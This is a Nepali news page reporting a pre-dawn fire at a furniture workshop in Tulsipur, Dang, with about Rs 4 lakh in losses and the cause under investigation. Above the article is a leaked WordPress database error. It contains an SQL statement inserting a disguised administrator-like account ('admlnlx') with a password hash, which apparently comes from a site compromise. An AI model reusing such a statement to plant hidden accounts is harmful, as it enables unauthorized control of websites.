WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCq87lGgLpEGLU55doxEC3pjv7.ahl0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 01:42:21', '', 'admlnlx', 'admlnlx')
दाङ,मंसिर २४ –
यहाँको एक फर्निचर उद्योगमा आगलागी भएको छ । तुलसीपुर–९ दोघरेमा रहेको तीर्थराज गिरीको फर्निचर उद्योगमा आगलागी हुँदा रु चार लाख बराबरको क्षति भएको गिरीले बताउनुभयो ।
आज बिहान करिब ४ बजे फर्निचर उद्योगमा आगलागी भएको प्रहरीले जनाएको छ । आगलागीबाट फर्निचर उद्योगका सामग्री र मेसिन जलेर नष्ट भएका छन् । आगलागीको कारण भने खुल्न नसकेको र अनुसन्धान भइरहेको इलाका प्रहरी कार्यालय तुलसीपुरका प्रमुख प्रहरी नायब उपरीक्षक लोकनाथ तिमिल्सेनाले जानकारी दिनुभएको छ । -रासस